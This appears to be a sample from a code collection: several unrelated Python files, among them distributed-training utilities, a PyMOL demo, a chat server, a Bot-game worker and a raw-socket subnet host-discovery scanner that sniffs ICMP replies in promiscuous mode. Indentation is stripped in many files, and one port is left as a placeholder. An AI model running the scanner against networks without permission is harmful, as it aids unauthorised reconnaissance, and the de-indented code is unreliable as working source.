for t in tensors:
sz = t.numel() * t.element_size()
if sz > buffer_size:
# tensor is bigger than buffer, all-reduce and rescale directly
torch.distributed.all_reduce(t)
t.div_(rescale_denom)
elif filled + sz > buffer_size:
# buffer is full, all-reduce and replace buffer with grad
all_reduce_buffer()
buffer = [t]
filled = sz
else:
# add tensor to buffer
buffer.append(t)
filled += sz
if len(buffer) > 0:
all_reduce_buffer()
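# Illustrative sketch (not part of the original module): average gradients
# across ranks after backward(). Assumes the process group has already been
# initialised via multi_init(); `_average_gradients_example` is a hypothetical
# helper for demonstration only.
def _average_gradients_example(model):
    grads = [p.grad.data for p in model.parameters()
             if p.requires_grad and p.grad is not None]
    # sum every gradient across ranks, then divide by the world size
    all_reduce_and_rescale_tensors(
        grads, rescale_denom=float(torch.distributed.get_world_size()))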
def all_gather_list(data, max_size=4096):
"""Gathers arbitrary data from all nodes into a list."""
world_size = torch.distributed.get_world_size()
if not hasattr(all_gather_list, '_in_buffer') or \
max_size != all_gather_list._in_buffer.size():
all_gather_list._in_buffer = torch.cuda.ByteTensor(max_size)
all_gather_list._out_buffers = [
torch.cuda.ByteTensor(max_size)
for i in range(world_size)
]
in_buffer = all_gather_list._in_buffer
out_buffers = all_gather_list._out_buffers
enc = pickle.dumps(data)
enc_size = len(enc)
if enc_size + 2 > max_size:
raise ValueError(
'encoded data exceeds max_size: {}'.format(enc_size + 2))
assert max_size < 255*256
in_buffer[0] = enc_size // 255 # this encoding works for max_size < 65k
in_buffer[1] = enc_size % 255
in_buffer[2:enc_size+2] = torch.ByteTensor(list(enc))
torch.distributed.all_gather(out_buffers, in_buffer.cuda())
results = []
for i in range(world_size):
out_buffer = out_buffers[i]
size = (255 * out_buffer[0].item()) + out_buffer[1].item()
bytes_list = bytes(out_buffer[2:size+2].tolist())
result = pickle.loads(bytes_list)
results.append(result)
return results
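# Illustrative sketch (not part of the original module): gather small per-rank
# statistics onto every process, e.g. to sum token counts. Requires an
# initialised process group and CUDA, since the buffers are cuda ByteTensors.
def _gather_token_counts_example(local_tokens):
    per_rank = all_gather_list({"tokens": local_tokens})
    return sum(stats["tokens"] for stats in per_rank)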
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
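# Hypothetical wiring sketch (not in the original file): the parent creates the
# queue and handler, then registers each spawned trainer so a traceback raised
# in any child is re-raised in the parent. `mp_context` is assumed to be a
# multiprocessing context such as torch.multiprocessing.get_context("spawn").
def _spawn_with_error_handler_example(mp_context, target_fn, nprocs):
    error_queue = mp_context.SimpleQueue()
    handler = ErrorHandler(error_queue)
    procs = []
    for device_id in range(nprocs):
        proc = mp_context.Process(
            target=target_fn, args=(device_id, error_queue), daemon=True)
        proc.start()
        handler.add_child(proc.pid)   # watch this child for crashes
        procs.append(proc)
    return procs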
def batch_producer(generator_to_serve, queue, semaphore, opt, device_id):
"""Produce batches to `queues` from `generator_to_serve`."""
log_level = "INFO" if opt.verbose or device_id == 0 else "WARNING"
init_logger(opt.log_file, log_level=log_level)
set_random_seed(opt.seed, False)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch():
# NOTE: stride (if needed) is handled at the
# generator (train_iter) level
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch()
while True:
b.dataset = None
        # Move the batch to the corresponding device_id when the consumer iterates
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
queue.put(b)
b = next_batch()
def consumer(process_fn, opt, device_id, error_queue, batch_queue, semaphore): # noqa: E501
"""Run `process_fn` on `device_id` with data from `batch_queue`."""
try:
gpu_rank = multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
process_fn(opt, device_id=device_id,
batch_queue=batch_queue, semaphore=semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
|
particle02.py
|
# demonstration of a particle cloud (non-interacting)
# similar to particle01.py except that each new state is retained in
# memory and used to assemble a movie with the number of states
# provided below
from random import random
from pymol import cmd
from time import sleep
particle_count = 1000
box_size = 500.0
n_states = 200
# constants
half_box = box_size / 2
# create N particle system [x,y,z,r,vx,vy,vz]
particle = []
for resi in range(0,particle_count):
    # list() keeps this working on Python 3, where map() returns an iterator
    particle.append([resi] +
                    list(map(lambda x: (random()-0.5)*box_size/2, [0]*3)) + # x,y,z
                    [random()+0.5] + # r
                    list(map(lambda x: (random()-0.5), [0]*3)) # vx,vy,vz
                    )
# create cloud object
for part in particle:
cmd.pseudoatom("cloud",
resi = part[0],
pos = part[1:4],
vdw = part[4])
# draw spheres efficiently
cmd.show_as("spheres")
cmd.unset("cull_spheres")
# defer geometry generation until needed
cmd.set("defer_builds",1)
# position the camera
cmd.zoom()
cmd.zoom("center",box_size)
# let there be color
cmd.spectrum()
# this is the main loop
def simulation():
state = 1
import traceback
try:
while state < n_states:
state = state + 1
for part in particle:
                # simplistic Euler integration
# p = p + v
part[1] = (half_box + part[1] + part[5]) % box_size - half_box
part[2] = (half_box + part[2] + part[6]) % box_size - half_box
part[3] = (half_box + part[3] + part[7]) % box_size - half_box
# v = v + pseudo-gravitational acceleration
factor = max(0.1*box_size, 0.1*(part[1]**2+part[2]**2+part[3]**2)**1.5)
part[5] = part[5] - part[1] / factor
part[6] = part[6] - part[2] / factor
part[7] = part[7] - part[3] / factor
# copy initial coordinates to a new state
cmd.create("cloud","cloud",1,state)
# update the new state coordinates
cmd.alter_state(state,"cloud","(x,y,z) = particle[int(resi)][1:4]",space=globals())
cmd.forward()
cmd.refresh()
# don't hog the CPU entirely
sleep(0.01)
cmd.mplay()
except:
traceback.print_exc()
# launch the main loop in a separate thread
import threading
thread = threading.Thread(target=simulation)
thread.setDaemon(1)
thread.start()
|
base.py
|
# Copyright 2021 iiPython
# Modules
import os
import time
from threading import Thread
from datetime import datetime
from .utils import Utils
from .console import Console
from .core.emoji.core import em
from .struct.status import codes
from .struct.client import Client
from .core.socket import Socket, SocketWrapper
try:
from iikp import readchar, keys
import importlib.util
_CMD_BAR_ENABLED = True
except ImportError:
_CMD_BAR_ENABLED = False
# Server class
class Server(object):
def __init__(self) -> None:
self.sock = Socket()
self.wrap = SocketWrapper(self.sock)
self.clients = []
self.console = Console()
self._exit = False
self._command = ""
self._user_check = None
# Module attribs
self.name = None
self.utils = Utils(self)
def to_dict(self) -> dict:
return {
"name": self.name,
"users": [client.to_dict() for client in self.clients]
}
def close(self) -> None:
# Shutdown clients
for client in self.clients:
client.shutdown()
# Exit server
self.console.print("\r[red]^C | Server shutdown successfully.")
os._exit(0) # Kills off our threads
def start(self, addr: tuple, name: str) -> None:
self.name = name
self.addr = addr
# Connect socket
self.sock.bind(("0.0.0.0", 2075))
self.sock.listen(5)
# Start text
self.console.clear()
self.console.print("[blue]Server running on [yellow]0.0.0.0:2075[blue]..")
# Client handler
Thread(target = self.command_bar).start()
Thread(target = self.refresh_all).start()
while True:
try:
conn, addr = self.sock.accept()
# Make note of this client
client = Client(self, (conn, addr))
if self._user_check is not None:
if not self._user_check(client, addr):
continue
# Handle thread
self.clients.append(client)
Thread(target = client.handle).start()
except KeyboardInterrupt:
return self.close()
def refresh_all(self) -> None:
while True:
if self._exit:
break
self.send_to_all({"status": codes.IGNORE})
time.sleep(1)
def send_to_all(self, data: dict) -> None:
if "content" in data:
data["content"] = em(data["content"])
        for client in list(self.clients):  # iterate over a copy; dead clients are removed below
            try:
                if client.dead:
                    continue
                client.sock.send_json(data)
            except OSError:
                self.clients.remove(client)
# Print to server
if data["status"] != codes.IGNORE:
            timestamp = datetime.now().strftime("%H:%M")
            lines, idx = data["content"].split("\n"), 0
            name = data["author"]["username"]
            for line in lines:
                if idx == 0:
                    self.print(f"[cyan]{timestamp} [green]{name}[reset]: {line}")
                else:
                    self.print(f"{' ' * len(f'{timestamp} {name}')}| {line}[reset]")
idx += 1
def print(self, data: str) -> None:
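        # Print a message above the command bar, then redraw the prompt underneath it.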
self.console.print(f"\r{self.console.ts()}\r{data}\n\r{self.cmdbar_prompt()}", end = "")
def command_bar(self) -> None:
if not _CMD_BAR_ENABLED:
return
# Load modules
_modules = {}
_mod_dir = os.path.join(os.path.dirname(__file__), "modules")
for module in os.listdir(_mod_dir):
if module[0] == "_" or os.path.isdir(os.path.join(_mod_dir, module)):
continue
spec = importlib.util.spec_from_file_location(
module.replace(".py", "", 1),
os.path.abspath(os.path.join(_mod_dir, module))
)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
mod.init(self.utils)
_modules = _modules | mod.cmap
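        # A module may export an "allow_user" callable in its cmap; if so it is used
        # as a connection filter in start() and must not be treated as a command.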
self._user_check = _modules.get("allow_user", None)
if self._user_check is not None:
_modules.pop("allow_user") # Not a command
# Loop
while True:
# Print command bar
self.console.print(f"\r{self.console.ts()}\r{self.cmdbar_prompt()}", end = "")
# Handle keypresses
key = readchar()
if isinstance(key, str):
self._command += key
elif key == keys.CTRL_C:
return self.close()
elif key == keys.BACKSPACE and self._command:
self._command = self._command[:-1]
elif key == keys.ENTER and self._command:
args = self._command.split(" ")
# Handle data
cmd = args[0]
args = args[1:]
# Find command
if cmd in _modules:
_modules[cmd](args)
# Reset
self._command = ""
def cmdbar_prompt(self) -> str:
return "" if not _CMD_BAR_ENABLED else self.console.print("[yellow]> [reset]", print_out = False) + self._command
# Initialization
server = Server()
|
webserver.py
|
'''
▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄
▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄
▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄
ZUMBY NSR CC [...]
'''
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "I'm online"
def run():
    app.run(host='0.0.0.0', port=xxxx)  # NOTE: xxxx is a placeholder -- fill in the port to serve on
def keep_alive():
t = Thread(target=run)
t.start()
|
scanner.py
|
import ipaddress
import os
import socket
import struct
import sys
import threading
import time
SUBNET = '192.168.1.0/24'
MESSAGE = 'PYTHONRULES!!!'
class IP:
def __init__(self, buff=None):
header = struct.unpack('<BBHHHBBH4s4s', buff)
self.ver = header[0] >> 4
self.ihl = header[0] & 0xF
self.tos = header[1]
self.len = header[2]
self.id = header[3]
self.offset = header[4]
self.ttl = header[5]
self.protocol_num = header[6]
self.sum = header[7]
self.src = header[8]
self.dst = header[9]
# human readable IP addresses
self.src_address = ipaddress.ip_address(self.src)
self.dst_address = ipaddress.ip_address(self.dst)
# map protocol constants to their names
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}
try:
self.protocol = self.protocol_map[self.protocol_num]
except Exception as e:
print('%s No protocol for %s' % (e, self.protocol_num))
self.protocol = str(self.protocol_num)
class ICMP:
def __init__(self, buff):
header = struct.unpack('<BBHHH', buff)
self.type = header[0]
self.code = header[1]
self.sum = header[2]
self.id = header[3]
self.seq = header[4]
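# Host-discovery trick: fire UDP datagrams at a (hopefully closed) high port on
# every host in the subnet; live hosts answer with an ICMP "port unreachable"
# message (type 3, code 3), which the sniffer below uses to mark them as up.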
def udp_sender():
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sender:
for ip in ipaddress.ip_network(SUBNET).hosts():
time.sleep(1)
print('+', end='')
sender.sendto(bytes(MESSAGE, 'utf8'), (str(ip), 65212))
class Scanner:
def __init__(self, host):
self.host = host
if os.name == 'nt':
socket_protocol = socket.IPPROTO_IP
else:
socket_protocol = socket.IPPROTO_ICMP
self.socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
self.socket.bind((host, 0))
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
print('hitting promiscuous mode...')
if os.name == 'nt':
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
def sniff(self):
hosts_up = set([f'{str(self.host)} *'])
try:
while True:
print('.',end='')
raw_buffer = self.socket.recvfrom(65535)[0]
ip_header = IP(raw_buffer[0:20])
if ip_header.protocol == "ICMP":
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset + 8]
icmp_header = ICMP(buf)
if icmp_header.code == 3 and icmp_header.type == 3:
if ipaddress.ip_address(ip_header.src_address) in ipaddress.IPv4Network(SUBNET):
if raw_buffer[len(raw_buffer) - len(MESSAGE): ] == bytes(MESSAGE, 'utf8'):
hosts_up.add(str(ip_header.src_address))
print(f'Host Up: {str(ip_header.src_address)}')
# handle CTRL-C
except KeyboardInterrupt:
if os.name == 'nt':
self.socket.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
print('\nUser interrupted.')
if hosts_up:
print(f'\n\nSummary: Hosts up on {SUBNET}')
for host in sorted(hosts_up):
print(f'{host}')
print('')
sys.exit()
if __name__ == '__main__':
if len(sys.argv) == 2:
host = sys.argv[1]
else:
host = '192.168.1.203'
s = Scanner(host)
time.sleep(10)
t = threading.Thread(target=udp_sender)
t.start()
s.sniff()
|
checkHeader.py
|
import pandas as pd
import requests
import threading
import json
import os
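# HEAD each avatar URL in its own thread and record those that do not return HTTP 200.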
def request_header(v, failed_links):
result = requests.head(str(v["avatar"]))
if result.status_code != 200:
failed_links[v["name"]] = str(v["avatar"])
def test_header(sheet, failed_links):
values = sheet["角色"].to_dict(orient="records")
thread_list = []
for v in values:
if str(v["avatar"]) == "nan":
# failed_links[v["name"]] = str(v["avatar"])
continue
t = threading.Thread(target=request_header, args=(v, failed_links))
thread_list.append(t)
t.start()
for t in thread_list:
t.join()
if __name__ == "__main__":
failed_links = {}
file = os.path.join(os.getcwd(), "tools", "relation.xlsx")
    # read every sheet into a DataFrame; load_workbook() would return worksheets,
    # which have no to_dict() method
    sheet = pd.read_excel(file, sheet_name=None)
test_header(sheet, failed_links)
    if failed_links:
raise ValueError("failed links: {0}".format(failed_links))
|
worker.py
|
import argparse
import copy
import os
import sys
import os.path
import glob
import json
import random
import shutil
import subprocess
import tempfile
import traceback
import logging
import uuid
import socket
from time import sleep, gmtime, strftime
import datetime
import threading
from flask import Flask
import archive
import backend
import compiler
import util
# Flask start
app = Flask(__name__)
# Log it real good
LOG_FILENAME = "worker-log-{}.data".format(uuid.uuid4())
# Constraints on # and size of log files read from bots
MAX_LOG_FILES = 1
MAX_LOG_FILE_SIZE = 50 * 1024 # 50 KiB
# Used to ensure system is running (watchdog timer)
TIME = datetime.datetime.now()
TIME_THRESHOLD = 60 * 18 # 18 mins in s
# Used by Watchdog timer to keep time
LOCK = threading.Lock()
# Where to create temporary directories
TEMP_DIR = os.getcwd()
# The game environment executable.
ENVIRONMENT = "halite"
# The script used to start the bot. This is either user-provided or
# created by compile.py.
RUNFILE = "run.sh"
# The command used to run the bot. On the outside is a cgroup limiting CPU
# and memory access. On the inside, we run the bot as a user so that it may
# not overwrite files. The worker image has a built-in iptables rule denying
# network access to this user as well.
BOT_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c 'cd \"{bot_dir}\" && ./{runfile}'"
# Commands for Julia precompilation (see below)
COMPILE_COMMAND = "cgexec -g cpu,memory,devices,cpuset:{cgroup} sudo -Hiu {bot_user} bash -c \"cd \\\"{bot_dir}\\\" && {command}\""
JULIA_PRECOMPILE_COMMANDS = [
# Must remove this if it exists, Julia doesn't expect us to change
# permissions on it
"rm -f {bot_dir}/logs/manifest_usage.toml",
"JULIA_DEPOT_PATH=\$(pwd) julia --project -e 'using Pkg; eval(:(using \\$(Symbol(Pkg.API.Context().env.project[\\\"name\\\"]))))'",
]
COMPILE_ERROR_MESSAGE = """
Your bot caused unexpected behavior in our servers. If you cannot figure out
why this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
UPLOAD_ERROR_MESSAGE = """
We had some trouble uploading your bot. If you cannot figure out why
this happened, please email us at halite@halite.io. We can help.
For our reference, here is the trace of the error:
"""
class OndemandCompileError(Exception):
"""
Error for when compilation fails before an ondemand game.
"""
def __init__(self, language, log):
self.language = language
self.log = log
def makePath(path):
"""Deletes anything residing at path, creates path, and chmods the directory"""
if os.path.exists(path):
shutil.rmtree(path)
os.makedirs(path)
os.chmod(path, 0o777)
def give_ownership(top_dir, group, dir_perms):
"""Give ownership of everything in a directory to a given group."""
for dirpath, _, filenames in os.walk(top_dir):
shutil.chown(dirpath, group=group)
os.chmod(dirpath, dir_perms)
for filename in filenames:
shutil.chown(os.path.join(dirpath, filename), group=group)
os.chmod(os.path.join(dirpath, filename), dir_perms)
def rm_as_user(user, directory):
"""Remove a directory tree as the specified user."""
subprocess.call(["sudo", "-H", "-u", user, "-s", "rm", "-rf", directory],
stderr=subprocess.DEVNULL,
stdout=subprocess.DEVNULL)
def executeCompileTask(user_id, bot_id, backend):
"""Downloads and compiles a bot. Posts the compiled bot files to the manager."""
logging.debug("Compiling a bot with userID %s\n" % str(user_id))
errors = []
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
try:
bot_path = backend.storeBotLocally(user_id, bot_id, temp_dir,
is_compile=True)
archive.unpack(bot_path)
# Make sure things are in the top-level directory
while len([
name for name in os.listdir(temp_dir)
if os.path.isfile(os.path.join(temp_dir, name))
]) == 0 and len(glob.glob(os.path.join(temp_dir, "*"))) == 1:
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as bufferFolder:
singleFolder = glob.glob(os.path.join(temp_dir, "*"))[0]
for filename in os.listdir(singleFolder):
shutil.move(os.path.join(singleFolder, filename), bufferFolder)
os.rmdir(singleFolder)
for filename in os.listdir(bufferFolder):
shutil.move(os.path.join(bufferFolder, filename), temp_dir)
# Context manager takes care of buffer folder
# Delete any symlinks
subprocess.call(["find", temp_dir, "-type", "l", "-delete"])
# Give the compilation user access
os.chmod(temp_dir, 0o755)
# User needs to be able to write to the directory and create files
give_ownership(temp_dir, "bots", 0o2770)
# Reset cwd before compilation, in case it was in a
# deleted temporary folder
os.chdir(os.path.dirname(os.path.realpath(sys.argv[0])))
language, more_errors = compiler.compile_anything(temp_dir)
didCompile = more_errors is None
if more_errors:
errors.extend(more_errors)
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
try:
if didCompile:
logging.debug("Bot did compile\n")
# Make things group-readable
subprocess.call([
"sudo", "-H", "-u", "bot_compilation", "-s",
"chmod", "-R", "g+r", temp_dir,
], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
archive_path = os.path.join(temp_dir, str(user_id)+".zip")
archive.zipFolder(temp_dir, archive_path)
backend.storeBotRemotely(user_id, bot_id, archive_path)
else:
logging.debug("Bot did not compile\n")
logging.debug("Bot errors %s\n" % str(errors))
backend.compileResult(user_id, bot_id, didCompile, language,
errors=(None if didCompile else "\n".join(errors)))
except Exception as e:
logging.error("Bot did not upload", e)
errors.append(UPLOAD_ERROR_MESSAGE + traceback.format_exc())
backend.compileResult(user_id, bot_id, False, language,
errors="\n".join(errors))
finally:
# Remove files as bot user (Python will clean up tempdir, but we don't
# necessarily have permissions to clean up files)
rm_as_user("bot_compilation", temp_dir)
def setupParticipant(user_index, user, temp_dir):
"""
Download and set up the bot for a game participant.
"""
# Include username to deal with duplicate bots
bot_dir = "{}_{}_{}".format(user["user_id"], user["bot_id"], user["username"])
bot_dir = os.path.join(temp_dir, bot_dir)
os.mkdir(bot_dir)
archive.unpack(backend.storeBotLocally(user["user_id"],
user["bot_id"], bot_dir))
if user.get("requires_compilation"):
        compile_dir = bot_dir + '_compile'
        errors = []  # pre-seed so the except handler below can always extend it
        try:
# Move to temp directory to avoid permission problems
# (can't chown files created by compile user back to us)
shutil.move(bot_dir, compile_dir)
# Give the compilation user access
os.chmod(compile_dir, 0o2755)
# User needs to be able to write to the directory
give_ownership(compile_dir, "bots", 0o2774)
language, errors = compiler.compile_anything(compile_dir)
didCompile = errors is None
except Exception:
language = "Other"
errors = [COMPILE_ERROR_MESSAGE + traceback.format_exc()] + errors
didCompile = False
if not didCompile:
# Abort and upload an error log
rm_as_user("bot_compilation", compile_dir)
raise OndemandCompileError(language, '\n'.join(errors))
# Move back to original directory
try:
shutil.copytree(compile_dir, bot_dir)
except shutil.Error as e:
logging.error("Could not compile bot ondemand", e)
rm_as_user("bot_compilation", compile_dir)
# Make the start script executable
os.chmod(os.path.join(bot_dir, RUNFILE), 0o755)
# Give the bot user ownership of their directory
# We should set up each user's default group as a group that the
# worker is also a part of. Then we always have access to their
# files, but not vice versa.
# https://superuser.com/questions/102253/how-to-make-files-created-in-a-directory-owned-by-directory-group
bot_user = "bot_{}".format(user_index)
bot_group = "bots_{}".format(user_index)
bot_cgroup = "bot_{}".format(user_index)
# We want 770 so that the bot can create files still; leading 2
# is equivalent to g+s which forces new files to be owned by the
# group
give_ownership(bot_dir, bot_group, 0o2770)
# For Julia bots, they -must- be precompiled before each game, as
# Julia's cache file stores absolute paths to source directories.
with open(os.path.join(bot_dir, "run.sh")) as lang_file:
lang = lang_file.readline().strip().lower()
if lang == "#julia":
for command in JULIA_PRECOMPILE_COMMANDS:
cmd = COMPILE_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
command=command.format(bot_dir=bot_dir),
)
print("Precompiling Julia:", cmd)
subprocess.run(cmd, cwd=bot_dir, shell=True)
bot_command = BOT_COMMAND.format(
cgroup=bot_cgroup,
bot_dir=bot_dir,
bot_group=bot_group,
bot_user=bot_user,
runfile=RUNFILE,
)
bot_name = "{} v{}".format(user["username"], user["version_number"])
return bot_command, bot_name, bot_dir
def runGame(environment_parameters, users, offset=0):
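    """Run a single game: stage each bot in a temp directory, invoke the game
    environment binary, collect bot logs, and return the environment's output lines."""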
with tempfile.TemporaryDirectory(dir=TEMP_DIR) as temp_dir:
shutil.copy(ENVIRONMENT, os.path.join(temp_dir, ENVIRONMENT))
command = [
"./" + ENVIRONMENT,
"--results-as-json",
]
for key, value in environment_parameters.items():
command.append("--{}".format(key))
if value:
command.append("{}".format(value))
# Make sure bots have access to the temp dir as a whole
# Otherwise, Python can't import modules from the bot dir
# Based on strace, Python lstat()s the full dir path to the dir it's
# in, and fails when it tries to lstat the temp dir, which this
# fixes
os.chmod(temp_dir, 0o755)
for user_index, user in enumerate(users):
bot_command, bot_name, bot_dir = setupParticipant(user_index + offset, user, temp_dir)
command.append(bot_command)
command.append("-o")
command.append(bot_name)
user['bot_dir'] = bot_dir
logging.debug("Run game command %s\n" % command)
logging.debug(command)
logging.debug("Waiting for game output...\n")
lines = subprocess.Popen(
command,
stdout=subprocess.PIPE).stdout.read().decode('utf-8').split('\n')
logging.debug("\n-----Here is game output: -----")
logging.debug("\n".join(lines))
logging.debug("--------------------------------\n")
# tempdir will automatically be cleaned up, but we need to do things
# manually because the bot might have made files it owns
for user_index, user in enumerate(users):
# keep any bot logs
user['bot_logs'] = ''
log_files_read = 0
for filename in os.listdir(user['bot_dir']):
try:
_, ext = os.path.splitext(filename)
if ext.lower() == '.log':
log_files_read += 1
user['bot_logs'] += '===== Log file {}\n'.format(filename)
with open(os.path.join(user['bot_dir'], filename)) as logfile:
user['bot_logs'] += logfile.read(MAX_LOG_FILE_SIZE)
user['bot_logs'] += '\n===== End of log {}\n'.format(filename)
except Exception:
# Ignore log and move on if we fail
pass
if log_files_read >= MAX_LOG_FILES:
break
bot_user = "bot_{}".format(user_index + offset)
rm_as_user(bot_user, temp_dir)
# The processes won't necessarily be automatically cleaned up, so
# let's do it ourselves
util.kill_processes_as(bot_user)
return lines
def parseGameOutput(output, users):
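    """Merge the game environment's JSON result (ranks, timeouts, error logs) back into copies of the user dicts."""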
users = copy.deepcopy(users)
logging.debug(output)
result = json.loads(output)
for player_tag, stats in result["stats"].items():
player_tag = int(player_tag)
users[player_tag]["player_tag"] = player_tag
users[player_tag]["rank"] = stats["rank"]
users[player_tag]["timed_out"] = False
users[player_tag]["log_name"] = None
for player_tag, error_log in result["error_logs"].items():
numeric_player_tag = int(player_tag)
users[numeric_player_tag]["timed_out"] = result["terminated"].get(player_tag, False)
users[numeric_player_tag]["log_name"] = os.path.basename(error_log)
return users, result
def executeGameTask(environment_parameters, users, extra_metadata, gameResult):
"""Downloads compiled bots, runs a game, and posts the results of the game"""
logging.debug("Running game with parameters {}\n".format(environment_parameters))
logging.debug("Users objects {}\n".format(users))
logging.debug("Extra metadata {}\n".format(extra_metadata))
raw_output = '\n'.join(runGame(
environment_parameters, users,
extra_metadata.get("offset", 0)))
users, parsed_output = parseGameOutput(raw_output, users)
gameResult(users, parsed_output, extra_metadata)
# Clean up game logs and replays
filelist = glob.glob("*.log")
for f in filelist:
os.remove(f)
os.remove(parsed_output["replay"])
# Make sure game processes exit
subprocess.run(["pkill", "--signal", "9", "-f", "cgexec"])
def _set_logging():
logging.basicConfig(filename=LOG_FILENAME, level=logging.INFO)
logging.getLogger('werkzeug').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.CRITICAL)
outLog = logging.StreamHandler(sys.stdout)
outLog.setLevel(logging.DEBUG)
outLog.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s'))
logging.getLogger().addHandler(outLog)
def set_time():
global LOCK
with LOCK:
global TIME
TIME = datetime.datetime.now()
logging.info("Setting time to {}".format(TIME))
def is_time_up_to_date():
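    """Watchdog check: True if the main loop has updated TIME within the last TIME_THRESHOLD seconds."""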
global LOCK
with LOCK:
global TIME
current_time = datetime.datetime.now()
logging.info("TIME DIFFERENCE: {}".format((current_time - TIME).total_seconds()))
if (current_time - TIME).total_seconds() > TIME_THRESHOLD:
return False
return True
@app.route('/health_check')
def health_check():
if is_time_up_to_date():
return "Alive", 200
else:
return "Dead. Last alive at {}".format(TIME), 503
def main(args):
_set_logging()
logging.info("Starting up worker at {}".format(socket.gethostname()))
threading.Thread(target=app.run, kwargs={'host':'0.0.0.0', 'port':5001, 'threaded':True}).start()
while True:
set_time()
try:
logging.debug("\n\n\nQuerying for new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
task = backend.getTask(args.task_type)
if "type" in task and (task["type"] == "compile" or task["type"] == "game"):
logging.debug("Got new task at time %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
logging.debug("Task object %s\n" % str(task))
if task["type"] == "compile":
logging.debug("Running a compilation task...\n")
executeCompileTask(task["user"], task["bot"], backend)
else:
logging.debug("Running a game task...\n")
executeGameTask(task.get("environment_parameters", {}),
task["users"], {
"challenge": task.get("challenge"),
}, backend.gameResult)
elif task.get("type") == "ondemand":
environment_params = task["environment_parameters"]
extra_metadata = {
"task_user_id": task["task_user_id"],
"offset": int(args.user_offset),
}
try:
executeGameTask(environment_params,
task["users"],
extra_metadata,
backend.ondemandResult)
except OndemandCompileError as e:
backend.ondemandError(
task["users"],
extra_metadata,
e.language, e.log
)
else:
logging.debug("No task available at time %s (GMT). Sleeping...\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
sleep(random.randint(1, 4))
except Exception as e:
logging.exception("Error on get task %s\n" % str(e))
logging.debug("Sleeping...\n")
sleep(random.randint(1, 4))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--task-type", default="task")
parser.add_argument("--user-offset", default=0)
args = parser.parse_args()
main(args)
|
slurm.py
|
"""
DMLC submission script, SLURM version
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import subprocess, logging
from threading import Thread
from . import tracker
def get_mpi_env(envs):
"""get the slurm command for setting the environment
"""
cmd = ''
for k, v in envs.items():
cmd += '%s=%s ' % (k, str(v))
return cmd
def submit(args):
"""Submission script with SLURM."""
def mpi_submit(nworker, nserver, pass_envs):
"""Internal closure for job submission."""
def run(prog):
"""run the program"""
subprocess.check_call(prog, shell=True)
cmd = ' '.join(args.command)
pass_envs['DMLC_JOB_CLUSTER'] = 'slurm'
if args.slurm_worker_nodes is None:
nworker_nodes = nworker
else:
nworker_nodes=args.slurm_worker_nodes
# start workers
if nworker > 0:
logging.info('Start %d workers by srun' % nworker)
pass_envs['DMLC_ROLE'] = 'worker'
prog = '%s srun --share --exclusive=user -N %d -n %d %s' % (get_mpi_env(pass_envs), nworker_nodes, nworker, cmd)
thread = Thread(target=run, args=(prog,))
            thread.daemon = True
thread.start()
if args.slurm_server_nodes is None:
nserver_nodes = nserver
else:
nserver_nodes=args.slurm_server_nodes
# start servers
if nserver > 0:
logging.info('Start %d servers by srun' % nserver)
pass_envs['DMLC_ROLE'] = 'server'
prog = '%s srun --share --exclusive=user -N %d -n %d %s' % (get_mpi_env(pass_envs), nserver_nodes, nserver, cmd)
thread = Thread(target=run, args=(prog,))
            thread.daemon = True
thread.start()
tracker.submit(args.num_workers, args.num_servers,
fun_submit=mpi_submit,
pscmd=(' '.join(args.command)))
|
test_streaming_pull_manager.py
|
# Copyright 2018, Google LLC
#
